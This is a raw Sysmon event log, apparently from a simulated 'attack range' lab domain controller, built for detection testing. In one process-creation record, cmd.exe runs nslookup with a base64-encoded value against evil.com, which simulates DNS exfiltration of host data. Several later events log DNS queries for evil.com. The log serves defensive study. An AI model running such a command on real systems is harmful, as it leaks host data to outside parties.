ystem32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217694Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.012{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217693Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.012{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217692Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.012{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1906-629A-2547-000000005F02}1848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217691Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.012{2E1864BB-1905-629A-2347-000000005F02}79522172C:\Windows\system32\cmd.exe{2E1864BB-1906-629A-2547-000000005F02}1848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217690Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:58.020{2E1864BB-1906-629A-2547-000000005F02}1848C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1905-629A-2347-000000005F02}7952C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnlqgn.tmp 2>&1 10341000x8000000000000000217689Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.990{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-1905-629A-2447-000000005F02}4780C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217688Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.990{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1905-629A-2447-000000005F02}4780C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217687Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.990{2E1864BB-1905-629A-2447-000000005F02}47807840C:\Windows\system32\conhost.exe{2E1864BB-1905-629A-2347-000000005F02}7952C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000217935Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.648{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51536- 354300x8000000000000000217934Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.648{00000000-0000-0000-0000-000000000000}1848<unknown process>-udptruefalse127.0.0.1-51536-false127.0.0.1-53domain 354300x8000000000000000217933Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.580{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51535- 354300x8000000000000000217932Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.580{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51535- 354300x8000000000000000217931Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.580{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51534- 354300x8000000000000000217930Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.580{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51534- 354300x8000000000000000217929Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.580{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51533- 354300x8000000000000000217928Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.580{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51533- 354300x8000000000000000217927Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.512{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51532- 354300x8000000000000000217926Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.512{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51532- 354300x8000000000000000217925Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.512{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51531- 354300x8000000000000000217924Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.512{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51531- 354300x8000000000000000217923Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.512{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51530- 354300x8000000000000000217922Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.512{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51530- 354300x8000000000000000217921Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.435{00000000-0000-0000-0000-000000000000}1044<unknown process>-udpfalsefalse127.0.0.1-51529-false127.0.0.1-53domain 354300x8000000000000000217920Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.435{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51529- 354300x8000000000000000217919Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.435{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51529- 354300x8000000000000000217918Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.435{00000000-0000-0000-0000-000000000000}1044<unknown process>-udptruefalse127.0.0.1-51529-false127.0.0.1-53domain 354300x8000000000000000217917Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.435{00000000-0000-0000-0000-000000000000}1044<unknown process>-udpfalsefalse127.0.0.1-51528-false127.0.0.1-53domain 354300x8000000000000000217916Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.435{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51528- 354300x8000000000000000217915Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.434{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51528- 354300x8000000000000000217914Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.434{00000000-0000-0000-0000-000000000000}1044<unknown process>-udpfalsefalse127.0.0.1-51527-false127.0.0.1-53domain 354300x8000000000000000217913Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.434{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51527- 354300x8000000000000000217912Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.434{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51527- 354300x8000000000000000217911Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.434{00000000-0000-0000-0000-000000000000}1044<unknown process>-udptruefalse127.0.0.1-51527-false127.0.0.1-53domain 354300x8000000000000000217910Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.358{00000000-0000-0000-0000-000000000000}7620<unknown process>-udpfalsefalse127.0.0.1-51526-false127.0.0.1-53domain 354300x8000000000000000217909Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.358{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51526- 354300x8000000000000000217908Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.358{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51526- 354300x8000000000000000217907Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.358{00000000-0000-0000-0000-000000000000}7620<unknown process>-udpfalsefalse127.0.0.1-51525-false127.0.0.1-53domain 354300x8000000000000000217906Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.358{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51525- 354300x8000000000000000217905Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.358{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51525- 354300x8000000000000000217904Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.358{00000000-0000-0000-0000-000000000000}7620<unknown process>-udptruefalse127.0.0.1-51525-false127.0.0.1-53domain 354300x8000000000000000217903Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.358{00000000-0000-0000-0000-000000000000}7620<unknown process>-udpfalsefalse127.0.0.1-51524-false127.0.0.1-53domain 354300x8000000000000000217902Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.357{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51524- 354300x8000000000000000217901Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.357{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51524- 354300x8000000000000000217900Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.357{00000000-0000-0000-0000-000000000000}7620<unknown process>-udptruefalse127.0.0.1-51524-false127.0.0.1-53domain 354300x8000000000000000217899Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.256{00000000-0000-0000-0000-000000000000}1804<unknown process>-udpfalsefalse127.0.0.1-51523-false127.0.0.1-53domain 354300x8000000000000000217898Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.256{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51523- 354300x8000000000000000217897Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.256{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51523- 354300x8000000000000000217896Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.256{00000000-0000-0000-0000-000000000000}1804<unknown process>-udptruefalse127.0.0.1-51523-false127.0.0.1-53domain 354300x8000000000000000217895Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.256{00000000-0000-0000-0000-000000000000}1804<unknown process>-udpfalsefalse127.0.0.1-51522-false127.0.0.1-53domain 354300x8000000000000000217894Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.256{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51522- 354300x8000000000000000217893Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.256{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51522- 354300x8000000000000000217892Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.256{00000000-0000-0000-0000-000000000000}1804<unknown process>-udptruefalse127.0.0.1-51522-false127.0.0.1-53domain 354300x8000000000000000217891Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.255{00000000-0000-0000-0000-000000000000}1804<unknown process>-udpfalsefalse127.0.0.1-51521-false127.0.0.1-53domain 354300x8000000000000000217890Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.255{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51521- 354300x8000000000000000217889Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.684{00000000-0000-0000-0000-000000000000}4176<unknown process>-udpfalsefalse127.0.0.1-51506-false127.0.0.1-53domain 354300x8000000000000000217888Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.684{00000000-0000-0000-0000-000000000000}4176<unknown process>-udptruefalse127.0.0.1-51506-false127.0.0.1-53domain 354300x8000000000000000217887Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.684{00000000-0000-0000-0000-000000000000}4176<unknown process>-udpfalsefalse127.0.0.1-51505-false127.0.0.1-53domain 354300x8000000000000000217886Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.683{00000000-0000-0000-0000-000000000000}4176<unknown process>-udptruefalse127.0.0.1-51505-false127.0.0.1-53domain 354300x8000000000000000217885Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.572{00000000-0000-0000-0000-000000000000}6116<unknown process>-udpfalsefalse127.0.0.1-51504-false127.0.0.1-53domain 354300x8000000000000000217884Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.572{00000000-0000-0000-0000-000000000000}6116<unknown process>-udptruefalse127.0.0.1-51504-false127.0.0.1-53domain 354300x8000000000000000217883Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.572{00000000-0000-0000-0000-000000000000}6116<unknown process>-udpfalsefalse127.0.0.1-51503-false127.0.0.1-53domain 354300x8000000000000000217882Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.571{00000000-0000-0000-0000-000000000000}6116<unknown process>-udptruefalse127.0.0.1-51503-false127.0.0.1-53domain 354300x8000000000000000217881Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.571{00000000-0000-0000-0000-000000000000}6116<unknown process>-udpfalsefalse127.0.0.1-51502-false127.0.0.1-53domain 354300x8000000000000000217880Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.571{00000000-0000-0000-0000-000000000000}6116<unknown process>-udptruefalse127.0.0.1-51502-false127.0.0.1-53domain 354300x8000000000000000217879Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.407{00000000-0000-0000-0000-000000000000}4280<unknown process>-udpfalsefalse127.0.0.1-51498-false127.0.0.1-53domain 354300x8000000000000000217878Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.407{00000000-0000-0000-0000-000000000000}4280<unknown process>-udptruefalse127.0.0.1-51498-false127.0.0.1-53domain 354300x8000000000000000217877Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.335{00000000-0000-0000-0000-000000000000}3832<unknown process>-udpfalsefalse127.0.0.1-51497-false127.0.0.1-53domain 354300x8000000000000000217876Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.335{00000000-0000-0000-0000-000000000000}3832<unknown process>-udptruefalse127.0.0.1-51497-false127.0.0.1-53domain 354300x8000000000000000217875Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.334{00000000-0000-0000-0000-000000000000}3832<unknown process>-udpfalsefalse127.0.0.1-51496-false127.0.0.1-53domain 354300x8000000000000000217874Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.334{00000000-0000-0000-0000-000000000000}3832<unknown process>-udptruefalse127.0.0.1-51496-false127.0.0.1-53domain 354300x8000000000000000217873Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.334{00000000-0000-0000-0000-000000000000}3832<unknown process>-udpfalsefalse127.0.0.1-51495-false127.0.0.1-53domain 22542200x8000000000000000217872Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.651{00000000-0000-0000-0000-000000000000}1848evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217871Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.583{00000000-0000-0000-0000-000000000000}6076evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217870Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.515{00000000-0000-0000-0000-000000000000}2928evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217869Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.436{00000000-0000-0000-0000-000000000000}1044evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217868Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.359{00000000-0000-0000-0000-000000000000}7620evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000217867Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.258{00000000-0000-0000-0000-000000000000}1804evil.com0::ffff:127.0.0.1;<unknown process> 23542300x800000000000000044930Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:59.003{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B69D058CED8908F178C95286BEE35877,SHA256=9F42211451A50E62754233B2AEF003C6C3D8A11B47ECBE7F95C5F717A1ECEC76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217984Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:00.858{2E1864BB-E13E-6299-1100-000000005F02}404NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=ABD77E849A0BFC04D093582B48F0098D,SHA256=B7A7F79DF22B428CD97DAE8C04D30490A936423928D9D4B09EED8F29EE40E6B2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217983Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.867{00000000-0000-0000-0000-000000000000}3140<unknown process>-udpfalsefalse127.0.0.1-51547-false127.0.0.1-53domain 354300x8000000000000000217982Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.867{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51547- 354300x8000000000000000217981Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.867{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51547- 354300x8000000000000000217980Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.867{00000000-0000-0000-0000-000000000000}3140<unknown process>-udptruefalse127.0.0.1-51547-false127.0.0.1-53domain 354300x8000000000000000217979Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.867{00000000-0000-0000-0000-000000000000}3140<unknown process>-udpfalsefalse127.0.0.1-51546-false127.0.0.1-53domain 354300x8000000000000000217978Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.867{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51546- 354300x8000000000000000217977Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.867{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51546- 354300x8000000000000000217976Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.867{00000000-0000-0000-0000-000000000000}3140<unknown process>-udptruefalse127.0.0.1-51546-false127.0.0.1-53domain 354300x8000000000000000217975Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 